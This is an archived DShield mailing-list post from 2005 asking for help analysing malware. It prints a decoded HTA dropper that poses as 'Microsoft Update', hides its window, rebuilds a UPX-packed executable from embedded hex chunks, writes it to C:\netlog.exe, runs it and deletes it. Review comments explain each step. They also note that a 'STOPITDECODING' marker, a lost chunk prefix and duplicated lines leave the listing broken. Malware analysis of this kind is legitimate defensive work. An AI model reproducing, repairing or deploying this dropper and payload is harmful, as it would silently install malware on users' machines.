[Dshield] Help Needed With Dissection of Exploit

Nemo Omen nemoaus at hotmail.com
Thu Aug 11 01:06:12 GMT 2005


Many thanks to everyone who has helped me to take apart this piece of 
malware. It's been a good learning experience for me. I've used the 
output.write method and iterated through the layers of obfuscation. The 
ppp.hta file was another script which produced the script below. Clearly 
this is building up a binary string using a similar decoding to what they 
used before. Can anyone tell me which exploit is being used with all the 
msmedia manipulation?

My other question is why did they bother with a multistage obfuscated 
loader? Why didn't they just put the script below into the passwords.html 
file to start with?

Next I will look at netlog.exe with IdaPro and see if I can work out a bit 
of what it is doing. At least netlog.exe is nice and small.

Also, are there any precautions I should take when posting these html listings 
of bugs to this list?

Cheers.   Nem


<!-- Analyst notes (added in review): this is an HTML Application (.hta).  HTAs
     run under mshta.exe with the trust of a local program, outside the browser
     security zones, so no memory-corruption exploit is needed at this stage --
     whatever got the .hta launched did the real work.  The title and
     APPLICATIONNAME impersonate "Microsoft Update"; SHOWINTASKBAR=NO and
     WINDOWSTATE=MINIMIZE keep the window out of the user's sight. -->
<HTML><HEAD><TITLE>Microsoft Update Wizard</TITLE>
<HTA:APPLICATION id=MSUpdate
APPLICATIONNAME="Microsoft Update"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<!-- "MSmedia" is a misleading id: this CLSID is Scripting.FileSystemObject,
     which the script below uses to create and later delete C:\netlog.exe.
     There is no media handling anywhere in this stage. -->
<OBJECT id="MSmedia" 
classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>
<!-- "MSplay" is likewise WScript.Shell; its Run method launches the dropped
     file. -->
<OBJECT id="MSplay" 
classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<BODY><SCRIPT language="VBScript">
' Analyst notes (added in review).  The statements below rebuild a Win32
' executable in memory: each J("...") call turns one chunk of hex pairs into
' raw bytes (see Function J) and the result is appended to y.
' The first chunk starts with 4D5A ("MZ") and contains 5045 ("PE"), 4C01
' (machine 0x014C, i386) and 55505821 ("UPX!"), so the payload is a
' UPX-packed PE file -- which is why netlog.exe looks "nice and small".
' NOTE(review): the leading "...STOPITDECODING..." is not hex.  J would most
' likely fail with a type-mismatch error on the first pair, so the listing as
' posted does not run -- presumably a marker inserted to defang it.
y=""
y=y+(J("...STOPITDECODING...4D5A00000000000000000000504500004C010200555058210000000000000000E0000F010B01000000120000000000000000000054010000001000000C0000000000141300100000000200"))

y=y+(J("000400000000000000040000000000000000500000000200000000000002000000000010000010000000001000001000000000000010000000000000000000000060480000840000000000"))

y=y+(J("000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"))

y=y+(J("0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000001000000000000000000000000000000000000000000000E00000C0"))

y=y+(J("00000000000000000010000000400000E108000000020000000000000000000000000000E00000C08725A4481413619455A4B680FF1373F933C9FF13731633C0FF13731FB68041B010FF13"))

y=y+(J("12C073FA753AAAEBE0FF530802F683D901750EFF5304EB24ACD1E8742D13C9EB189148C1E008ACFF53043B43F8730A80FC05730683F87F77024141958BC5B600568BF72BF0F3A45EEB9F5E"))

' This chunk contains 4B45524E454C33322E646C6C00, i.e. "KERNEL32.dll" -- the
' one import library the packed stub names; consistent with a UPX stub.
y=y+(J("AD97AD50FF5310958B074078F37503FF630C5055FF5314ABEBEE33C941FF1313C9FF1372F8C302D275058A164612D2C34B45524E454C33322E646C6C00009D0C1F1413AB09BD89CD12D524"))

y=y+(J("E148ED880320111B22374447FFC3027F352137102B09789117220F4405EBCC41F309FBA62853CF0822AD649D098D48719165297F1C9995716B9109816E216A4908477F806E746572E9CFAB"))

y=y+(J("471F06436F3312631F1E64539B610C86021C77696EB0372E646CE3C06F70F3F770271F3A730AFD7F1E20222539F93C49660F4578692A740EBD9E676F797AA51EB681613D5C638C76686F48"))

y=y+(J("2E28657853C32066696CDFD662C2CC1925CC6D7570705C7772286F781C386874FF383A2FD00F2E1D6E616DFDBC64BC775505193E0F01E801A7841877022E61077364666768736F72AFF531"))

y=y+(J("6B81E4248038847918616E64EE2E724975038770682D361B84AC0AD409C665043274FA080C31E441C410069120610CD208072F69762C08657F734866287FFA68FD8E1261702E6CEE63D92A"))

y=y+(J("6F32311D26559B625CFA6B845857C44E59CA445330667567726C799D92EBC4D30948E26487E96EE750CD50B3923E52E17175991074124EFBAB7732AC6B4E638C18504F624B896172689567"))

y=y+(J("3A4C20AE483C6DC46E87514861768C2068EDA42EBC2068F7314224C1209039D0BE97CC25792600D0E0E7E1EBEEEAE874F07AE238F2FC18CEEF10E5F9E4ED75E83A20F1727BF258EC4D3FE1"))

y=y+(J("07E7EEEFE0E7ED5C1EE8FB5DACC3066FF0E5F8E8643A20FD16EEEC0F76EFDF338CE63D71FE9BE2FB88E796FF37EDF5E1F33990E4B0E974E2E8FF9020196E5669EC54314002BB4D8E95F496"))

y=y+(J("7D80D1EA1CF0FBF298E981EEF638E5F1F837E7E0143DB0078CD5F21B8108B796EE3863E4F5F3EF1958CECA09E14288E28E779E1EF443F0ECE0F60AE3E4EBFF8647E32F4AEA8B32F8ED8F86"))

y=y+(J("AAE0F045C21A8E422ACA15362634DB42D4DD292201D8E8E7EEA5B0EB0CE6FC59D17EEE36E4E0AFFD55E2CA155431205965DA8F4C120C7E6D0462FB22CD8E6E8A770CBAFBF5E178DF371269"))

y=y+(J("3CE749C37573ED22207041B467CEC1AB2EC150BB4C6E203243F5446C6731915C09538BD8240C005633F685DB7E3257F87CF8101BE8BA082CC8C8B8D33E4D6203F7E9C1FA07E3C2A8E81F03"))

y=y+(J("3BD080806188143E463BF3067CDDC6041F4407C75F5E5BC366447AEF9C1E18321690900151561768B01046B715080D008BF085F6750532C0065E59C368942164562E044585C03015538D4C"))

y=y+(J("1C24086A0651FFD0263F0F958684DB740747E1138AEB5B404054E84AAB0C0284621D0C568B350C3368E827A09FFFD62AE894171874F03390C204E1B40C0B308081EC0C6303428D8429B002"))
2AE894171874F03390C204E1B40C0B308081EC0C6303428D8429B002"))
' NOTE(review): the bare line above repeats the tail of the preceding chunk;
' it is a mail line-wrap artefact and not valid VBScript.

y=y+(J("DD0C1D1C69550B56576804A03950FFD3BFF011C72083C99C628D1894241847F2AE0AF7D12BF91F9E8BB93AE936FA3B28F6CD3E4FC10C02F3A5108DA0E214831FE1035018A47BF410851254"))

y=y+(J("11293AA2D91447CB78A98418A1393D20E583D8F4468D8C9ED02B401B515226E48D0E8A3A747268343A463250513245101CA26860F01952E83B07C499C40886535553104734504658329668"))

y=y+(J("C4C74B56E858B20C04A52B181A29B601025068BCA13F841558080EE8DC061B2F148D200209295120EAD9025D5B81C4444748C3508818A841C46B71FE847325A7654C09891111E7201537C6"))

y=y+(J("2051E8B0FDD442A622708AA92EE3942E145250676C65C8128206DBD638421099351C5681469034841CF0ACDF1159280BE8F90659C518E2C65180150DCD01ECA4114CC5478B46DED244CD84"))

y=y+(J("AA661EED864E2220114303290871B19C20111D07FBBA4E43F905855B11E38C8C1552AD4890A484BB053682FD0A40026848180CC87C858B3D84769104A3AC4336CD48D526D7F48223558B2D"))

y=y+(J("67C315D53DD122C174E55D50928C8063A33951D58A5480A5F3542D84CD88C7FC6E1D81DCF60A53457091A4645006689175860C6A012EEB081D4474687944A6C167D3B72AD740DA98CC74D5"))

y=y+(J("1D8BF8854A74187D9501EC2857E38B0CDC6411CE37BA708D08F4125FA43DA60B20372E8BD884050F843A96D81C5053C76C8868C8A64657537DF410A72AF69221F1FE212ED0E9D4CB3B90BA"))

y=y+(J("3097601D84217E7A588C869C405E57AEB7742C8C455714D64FB701E22068902453500C239128FC852AA045FB918760664B0D628CAE866D49FC5FA328E42FDE15E837AF5696C4745D8E9239"))

y=y+(J("B4C6FD1A2A91E0C88CD17CF617EBA44A52CE3F115BFEA3B49C7AC812F421F5FD4ED2C26368124C29904291224268DC6C1CFA749C08C98CDD1C56AE9874A48C4256D2292093BCD32D20BC19"))

y=y+(J("299C2A4A1893A22D1728CB13EB9462C0142B85F4F9913915289FBD503B692504AD04A2ACD28A7E334C25EC0EA751E8FE1736C9AB245C57449518170852E8E7A09394CA044733C0B6E14019"))

y=y+(J("8B72C1F8BFB11C2519DCC82CD5776EA49D3992B5168346282EC6B40AE8A35B90181F75A66C5162E88BA512048247242897890850184F9018ACDD916F6C29F04219D8AA0452A814301C85B2"))

' NOTE(review): the next line is a chunk whose 'y=y+(J("' prefix was lost in
' the mail; the posted listing is therefore incomplete, and the decoded file
' will not match the real netlog.exe unless that chunk is restored.
0CB10119C2115812DE2430443C21088C915E227C45A40E3B14381F4F"))

y=y+(J("A894A51464842F4301BA83467265884C6962EC61F079D21DB11079901C41647FDF267C027E4C7D61A620504110536B6C60E892436FEC794A46C4D51D1580737472636D70D04042824D6F64"))

y=y+(J("F884811D4E2B11CF1697985B44EF9FB4637CD34E0945787050EFEDCD769E2C6F3758B374536194506773417CD0A15468940F6444DF4669636BF26C754E1C4B1C45524EC44C3332B8A79B03"))

y=y+(J("31B47075746608536868D26F48E26D15090E161CCAFC4DAADCF0A0FF5A1E418C08207451469ED567CFAA75B319815553A1DA6A4CBC65DA125AF8CE6F7487CA48862187CA27146EACC16578"))

y=y+(J("6974400866636C3E6F73D50A199F040AB955943590B5400A5FCD1775400914A00730F5504B4D5356154352547A8F55644C44B8146AA6111E54247DE37572FA6D423B32225CD8E5430D7748"))

y=y+(J("85A14816664FF36D55606C1B14672257F64E045745694701AEBBD800000000B84800000000000000000000F2010000B8480000000000000000000000000000000000000000000000101413"))

' The last two chunks end with 4C6F61644C69627261727941 ("LoadLibraryA") and
' 4765745072 + 6F63416464726573730000 ("GetProcAddress"): the two imports a
' UPX stub resolves everything else through.
y=y+(J("004014137C1E141300000000A848141380000000007D000088481413E8011413DC011413DE011413B01C1413C2480000D0480000000000004C6F61644C6962726172794100004765745072"))

y=y+(J("6F63416464726573730000"))

' Drop-and-run stage.  "MSmedia" is Scripting.FileSystemObject and "MSplay"
' is WScript.Shell (see the OBJECT tags).  The decoded bytes are written to a
' fixed path, executed, and the file is deleted to remove the on-disk
' artefact.  For detection: mshta.exe creating and launching C:\netlog.exe.
FN = "C:\netlog.exe"
' CreateTextFile(path, True): overwrite if present; no Unicode flag, so the
' Chr()-built string is written back out as single bytes.
Set IESetup = MSmedia.CreateTextFile(FN, True)
IESetup.Write (y)
IESetup.Close()
' WScript.Shell.Run: window style 1, True = wait for the process to exit
' before continuing (so the DeleteFile below does not race the launch).
MSplay.Run (FN), 1, True
MSmedia.DeleteFile (FN)
self.Close
' NOTE(review): the two lines below repeat the run/delete after self.Close
' has already closed the HTA; most likely a copy/paste duplication in the
' post rather than a second execution.
MSplay.Run (FN), 1, True
MSmedia.DeleteFile (FN)
' J: decode a string of two-character hex pairs into the string whose
' characters have those code points, e.g. J("4D5A") = "MZ".
' Each pair is read with Mid, parsed via VBScript's "&h" hex prefix, and
' converted with Chr; pairs are consumed left to right and concatenated.
Function J(J1)
    Dim decoded, pos
    decoded = ""
    pos = 1
    Do While pos <= Len(J1)
        decoded = decoded & Chr("&h" & Mid(J1, pos, 2))
        pos = pos + 2
    Loop
    J = decoded
End Function
</SCRIPT></BODY></HTML>



